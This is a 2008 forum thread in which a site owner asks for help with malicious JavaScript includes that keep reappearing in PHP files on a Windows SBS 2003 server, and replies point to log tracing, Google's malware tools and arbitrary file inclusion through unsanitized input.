ok Im not talking about SQL injection I'm talking about actual file injection. For example at the end of your php files you find some include to a javascript file on some other server. You erase the crazy code and then an hour later it come back.

Someone or something is actually access the machine and changing files and permission. Windows Small Business Server 2003. If you can cure it we can pay you.

AIM: mfetimine

11/15/2008 8:39:08 AM

I think google has some tools to find holes where malware injects itself. Look at Matt Cutts blog, he's talked about it before. Feel free to pm me, I'm at a conference all day today but I'll get back to you

[Edited on November 15, 2008 at 10:41 AM. Reason : .]

11/15/2008 10:41:01 AM

You just need to trace through your IIS access logs, you will find the injection point that way with just a little text searching.

Likely they exploited a vulnerable website, and injected a dashboard, then used that to start doing file and permissions attacks

11/16/2008 7:09:51 AM

arbitrary file inclusion sir. you aren't sanitizing an input somewhere and/or you probably could use some locking down of your php.ini

[Edited on November 17, 2008 at 2:53 AM. Reason : they used an arbitrary file inclusion to upload code to create the symptoms you posted like ^ said]

11/17/2008 2:52:26 AM